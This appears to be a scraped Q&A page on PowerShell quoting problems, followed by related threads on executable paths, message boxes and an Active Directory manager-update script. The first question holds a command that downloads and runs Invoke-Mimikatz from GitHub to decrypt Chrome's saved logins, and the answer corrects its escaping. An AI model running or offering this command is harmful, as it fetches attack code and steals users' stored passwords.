Mimikatz - problem with handling spaces in the file path Dpapi::chrome [duplicate] - powershell

This question already has an answer here:
Powershell in Jenkins escaping characters for path
(1 answer)
Closed 1 year ago.
Why can't mimikatz/kiwi process the first space when opening the Chrome database "Login Data"?
Example:
IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappdata%\Google\Chrome\User Data\Default\Login Data\""
Error:
Invoke-Mimikatz : A positional parameter cannot be found that accepts argument 'Data\Default\Login'.
At line:1 char:146
+ ... katz.ps1'); Invoke-Mimikatz -Command "dpapi::chrome /in:\"%localappda ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [Invoke-Mimikatz], ParameterBindingException
+ FullyQualifiedErrorId : PositionalParameterNotFound,Invoke-Mimikatz
I will be very happy if someone helps, I have already tried all.

You need to escape the " inside the string argument by doubling them ("") or prefixing them with a single ` (PowerShell doesn't care about \):
"dpapi::chrome /in:""%localappdata%\Google\Chrome\User Data\Default\Login Data"""
# or
"dpapi::chrome /in:`"%localappdata%\Google\Chrome\User Data\Default\Login Data`""

Related

PowerShell command cannot parse string literal and finds unknown positional parameter

I am trying to run a PowerShell command (DesktopAppConverter) and I'm getting an error saying it is finding an unknown positional parameter.
DesktopAppConverter -AppInstallPath 'C:\Program Files (x86)\Search Deflector' -Destination '.\AppxPackage\' -Installer '.\ClassicInstaller\SearchDeflector-Installer.exe' -InstallerArguments '/COMPONENTS="main"','/VERYSILENT','/DIR="C:\Program Files (x86)\Search Deflector"' -MakeAppx -PackageName '3945spikespaz.SearchDeflector' -Publisher 'CN=69331A0A-1F10-4A10-8A28-3627A09E25FD' -Version '0.0.3.0' -AppId 'SearchDeflector' -AppDisplayName 'Search Deflector' -AppDescription 'A small program that forwards searches from Cortana to your preferred browser and search engine.' -PackagePublisherDisplayName 'spikespaz' -PackageArch 'x86' -Sign -Verbose
I also tried replacing the single quotes with double quotes and escaping the quotes in the InstallerArguments array with backticks. No dice.
C:\Program Files\WindowsApps\Microsoft.DesktopAppConverter_2.1.4.0_x64__8wekyb3d8bbwe\DesktopAppConverter.ps1 : A positional parameter cannot be found that accepts
argument '/VERYSILENT'.
At line:1 char:1
+ &'C:\Program Files\WindowsApps\Microsoft.DesktopAppConverter_2.1.4.0_ ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidArgument: (:) [DesktopAppConverter.ps1], ParameterBindingException
+ FullyQualifiedErrorId : PositionalParameterNotFound,DesktopAppConverter.ps1
My guess is that it's splitting the parameters at the very first space in the AppInstallPath string.

how to execute an exe with variable value for path and arguments

I'm trying to execute in my powershell script the command below :
D:\Apps\Documentum\product\7.3\bin\idql.exe -udmadmin -pPassword dctm04 -RC:\temp\documentum\session_list.txt -w20 > C:\temp\documentum\session_logstash.txt
In my powershell script I do that:
$DOCBASE="dctm04"
$USER_DOCBASE="dmadmin"
$USER_PWD="Password01"
$IDQL_PATH="D:\Apps\Documentum\product\7.3\bin"
$QRY_SESSIONS="C:\temp\documentum\session_list.txt"
$QRY_LOG_SESSIONS="C:\temp\documentum\session_logstash.txt"
$IDQL_PATH\idql.exe -u$USER_DOCBASE -p$USER_PWD $DOCBASE -R$QRY_SESSIONS -w20 > $QRY_LOG_SESSIONS
But it doesn't work properly, I receive the error below :
At C:\temp\documentum\Generate.ps1:49 char:13
+ $IDQL_PATH\idql.exe -u$USER_DOCBASE -p$USER_PWD $DOCBASE -R$QRY_SESSIONS -w20 ...
+ ~~~~~~~~~
Unexpected token '\idql.exe' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParseException
+ FullyQualifiedErrorId : UnexpectedToken
I think I don't use the variable properly in my command.
Please note my powershell version is :
PS C:\temp\documentum> $PSVersionTable.PSVersion
Major Minor Build Revision
----- ----- ----- --------
4 0 -1 -1
Could you give me the solution in order to solve my problem?
The reason is that combining a string to executable name makes no sense to Powershell's parsing rules. Use the call operator & or Invoke-Item. Like so,
$ssms="C:\Program Files (x86)\Microsoft SQL Server\140\Tools\Binn\ManagementStudio"
PS C:\> $ssms\ssms.exe
At line:1 char:6
+ $ssms\ssms.exe
+ ~~~~~~~~~
Unexpected token '\ssms.exe' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : UnexpectedToken
C:\>& $ssms\ssms.exe
# Launches SSMS successfully
C:\>Invoke-Item $ssms\ssms.exe
# Launches SSMS successfully
There's a nice document about running executables.
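The call-operator approach from the answer above, extended to pass arguments and check the exit code; this is an added example, not code from the original posts. `Invoke-NativeTool` is a hypothetical helper name, and `cmd.exe` stands in for `idql.exe` so the block runs on any Windows host.

```powershell
# Added example: Invoke-NativeTool is a hypothetical helper, not part of PowerShell.
function Invoke-NativeTool {
    param(
        [Parameter(Mandatory)] [string] $Directory,
        [Parameter(Mandatory)] [string] $Name,
        [string[]] $Arguments = @()
    )
    # Join-Path yields one path string, so spaces in $Directory are harmless.
    # A bare "$Directory\$Name" token at the start of a statement is a parse error.
    $exe = Join-Path -Path $Directory -ChildPath $Name
    if (-not (Test-Path -LiteralPath $exe -PathType Leaf)) {
        throw "Executable not found: $exe"
    }
    # The call operator runs the command named by the string.
    # Splatting the array passes each element as exactly one argument.
    $output = & $exe @Arguments
    if ($LASTEXITCODE -ne 0) {
        throw "$Name exited with code $LASTEXITCODE"
    }
    $output
}

# Constructed demo: cmd.exe is a stand-in for the real tool.
$dir = Split-Path -Parent $env:ComSpec
Invoke-NativeTool -Directory $dir -Name 'cmd.exe' -Arguments '/c', 'echo', 'hello world'

# With the variables from the question the call would look like this:
# Invoke-NativeTool -Directory $IDQL_PATH -Name 'idql.exe' `
#     -Arguments "-u$USER_DOCBASE", "-p$USER_PWD", $DOCBASE, "-R$QRY_SESSIONS", '-w20' `
#     > $QRY_LOG_SESSIONS
```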

How to create a messagebox as an argument to powershell.exe?

How can I provide arguments to powershell.exe in order to spawn a message box? The key phrase here is arguments to powershell.exe, not from within a .ps1 script and also not from within the Powershell prompt itself. I currently have this but it is producing errors:
powershell.exe -Command "[System.Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms"); [System.Windows.Forms.MessageBox]::Show("Test!!!")"
I have also tried without -Command and with Invoke-Expression, with and without double quotes surrounding.
Errors created:
At line:1 char:51
+ [System.Reflection.Assembly]::LoadWithPartialName(System.Windows.Form ...
+ ~
Missing ')' in method call.
At line:1 char:51
+ ... eflection.Assembly]::LoadWithPartialName(System.Windows.Forms); [Syst ...
+ ~~~~~~~~~~~~~~~~~~~~
Unexpected token 'System.Windows.Forms' in expression or statement.
At line:1 char:71
+ ... flection.Assembly]::LoadWithPartialName(System.Windows.Forms); [Syste ...
+ ~
Unexpected token ')' in expression or statement.
At line:1 char:114
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~
Missing ')' in method call.
At line:1 char:114
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~~~~~~~
Unexpected token 'Test!!!' in expression or statement.
At line:1 char:121
+ ... stem.Windows.Forms); [System.Windows.Forms.MessageBox]::Show(Test!!!)
+ ~
Unexpected token ')' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
This is a quotation problem. Using the same double quote " in both argument and its contents messes up the content. As a work-around, use single quotes within the Powershell command and double quotes around the whole -Command parameter. Like so,
powershell.exe -Command "[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms'); [System.Windows.Forms.MessageBox]::Show('Test!!!')"
That being said, Add-Type -AssemblyName is IMAO a prettier way to load assemblies. Like so,
powershell.exe -Command "add-type -assemblyname System.Windows.Forms; [System.Windows.Forms.MessageBox]::Show('Test!!!')"

How to execute PowerShell Net MessageBox in cmd/batch

I have a batch file with lot of stuff. In it there is one Alert Window with info for the user.
On Windows Pro I'm using Msg command for it and it works fine.
On Windows Home there is no Msg, so I got the idea to use PowerShell instead:
[System.Windows.Forms.MessageBox]::Show("my text")
which works fine in PowerShell.
However, when I try to use it in batch or execute it directly in Cmd, I only get the text:
C:\Windows\System32>powershell {[System.Windows.Forms.MessageBox]::Show("\""my text"\"")}
[System.Windows.Forms.MessageBox]::Show("my text")
Or I get errors:
C:\Windows\System32>powershell -command [System.Windows.Forms.MessageBox]::Show("my text")
At line:1 char:41
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~
Missing ')' in method call.
At line:1 char:41
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~~
Unexpected token 'my' in expression or statement.
At line:1 char:48
+ [System.Windows.Forms.MessageBox]::Show(my text)
+ ~
Unexpected token ')' in expression or statement.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : MissingEndParenthesisInMethodCall
or
C:\Windows\System32>powershell -command "& {[System.Windows.Forms.MessageBox]::Show('my text')}"
Unable to find type [System.Windows.Forms.MessageBox].
At line:1 char:4
+ & {[System.Windows.Forms.MessageBox]::Show('my text')}
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (System.Windows.Forms.MessageBox:TypeName) [],
RuntimeException
+ FullyQualifiedErrorId : TypeNotFound
What should I do to get it to work?
(without rewriting the whole script to PowerShell, that is)
As TheMadTechnician stated, you may need to load it first.
This is effectively the same answer as theirs just over a couple of lines:
@Echo Off
PowerShell -Command^
"[Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms')|Out-Null;"^
"[System.Windows.Forms.MessageBox]::Show(\"my text\")"
Pause
…and whilst double quotes around my text is not necessary, I've used them to show you the escapes.
You need to load the type before you can invoke it. You can do this:
powershell -command "[reflection.assembly]::LoadWithPartialName('System.Windows.Forms')|out-null;[windows.forms.messagebox]::Show('my message')"

PowerShell Bulk update Active Directory Managers field [duplicate]

This question already has an answer here:
You cannot call a method on a null-valued expression
(1 answer)
Closed 5 years ago.
I'm trying to update our managers field in our active directory and have a script
the input file looks like this
Firstname.LastnameEmployee;firstname.lastnameManager
Here is the script I'm using...
This is the error I'm getting
You cannot call a method on a null-valued expression.
At line:26 char:5
+ $ObjSearchemployee.Filter = "(&(objectCategory=person)(objectClass=user)(sAM ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
You cannot call a method on a null-valued expression.
At line:31 char:9
+ $ObjSearchmanager.Filter = "(&(objectCategory=person)(objectClass=user)( ...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : InvalidOperation: (:) [], RuntimeException
+ FullyQualifiedErrorId : InvokeMethodOnNull
###############################################################
# Update_Manager_v1.0.ps1
# input : n/a
# output : none (logs)
# Version 1.
# Changelog : n/a
# MALEK Ahmed - 02 / 06 / 2013
###################
##################
#--------Config
##################
$adPath="LDAP://DC=local,DC=com"
##################
#--------Main
##################
#LDAP connection
$objDomain=New-Object System.DirectoryServices.DirectoryEntry($adPath)
#Doing an LDAP search
$ObjSearchemployee=New-Object System.DirectoryServices.DirectorySearcher($ObjDomain)
$ObjSearchmanager=New-Object System.DirectoryServices.DirectorySearcher($ObjDomain)
#Operations on user accounts
Import-Csv .\input.csv -Delimiter ';' | Foreach-Object {
    $ObjSearchemployee.Filter = "(&(objectCategory=person)(objectClass=user)(sAMAccountName="+ $_.employee.trim() +"))"
    $allSearchResultemployee = $ObjSearchemployee.FindAll()
    foreach ($objSearchResultemployee in $allSearchResultemployee)
    {
        $objUseremployee=New-Object System.DirectoryServices.DirectoryEntry($objSearchResultemployee.Path)
        $ObjSearchmanager.Filter = "(&(objectCategory=person)(objectClass=user)(sAMAccountName="+ $_.manager.trim() +"))"
        $allSearchResultmanager = $ObjSearchmanager.FindAll()
        foreach ($objSearchResultmanager in $allSearchResultmanager)
        {
            $objUsermanager=New-Object System.DirectoryServices.DirectoryEntry($objSearchResultmanager.Path)
            $objUseremployee.manager = $objUsermanager.distinguishedname
        }
        $objUseremployee.CommitChanges()
        "" + $objUsermanager.displayName + " is now the manager of " + $objUseremployee.displayName + ""
    }
}
$_.Employee.trim() is the problem since you do not have a column header of "Employee" as per your source example. See You cannot call a method on a null-valued expression.
Assuming your first column is for the samaccountname then you should change that to $_.Firstname.LastnameEmployee.trim() else you need to redefine how your search is being done or update your source file to contain the relevant information and get your code to match.
As the error suggests you will have the same problem with $_.Manager.trim()
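One way to handle the header-less input file described above, as an added example that is not part of the original posts: the columns are named explicitly, rows with a missing column are skipped instead of calling `.Trim()` on `$null`, and each value is escaped per RFC 4515 before it is concatenated into the LDAP filter. `ConvertTo-LdapFilterValue` and `Get-ManagerFilter` are hypothetical helper names, the sample rows are constructed, and no directory is queried.

```powershell
# Added example: both function names are hypothetical; sample rows are constructed.
function ConvertTo-LdapFilterValue {
    param([Parameter(Mandatory)] [string] $Value)
    # RFC 4515: escape the backslash first, then * ( ) and NUL as \HH.
    $Value = $Value.Replace('\', '\5c')
    $Value = $Value.Replace('*', '\2a').Replace('(', '\28').Replace(')', '\29')
    $Value.Replace([string][char]0, '\00')
}

function Get-ManagerFilter {
    param([Parameter(Mandatory)] [string[]] $Line)
    # The file has no header row, so -Header supplies the property names
    # that the script later reads as $_.employee and $_.manager.
    $rows = $Line | ConvertFrom-Csv -Delimiter ';' -Header 'employee', 'manager'
    foreach ($row in $rows) {
        # A missing column arrives as $null; skip the row rather than
        # hitting "You cannot call a method on a null-valued expression".
        if ([string]::IsNullOrWhiteSpace($row.employee) -or
            [string]::IsNullOrWhiteSpace($row.manager)) {
            Write-Warning "Skipping incomplete row"
            continue
        }
        $emp = ConvertTo-LdapFilterValue $row.employee.Trim()
        $mgr = ConvertTo-LdapFilterValue $row.manager.Trim()
        [pscustomobject]@{
            EmployeeFilter = "(&(objectCategory=person)(objectClass=user)(sAMAccountName=$emp))"
            ManagerFilter  = "(&(objectCategory=person)(objectClass=user)(sAMAccountName=$mgr))"
        }
    }
}

# Constructed sample: a normal row, a row missing the manager column,
# and a row whose value contains filter metacharacters.
$sample = @(
    'john.doe;jane.roe',
    'broken.row',
    'j.smith(ext);bob.lee'
)
Get-ManagerFilter -Line $sample | Format-List
```

The filters returned here can be assigned to `$ObjSearchemployee.Filter` and `$ObjSearchmanager.Filter` in place of the string concatenation in the question's script.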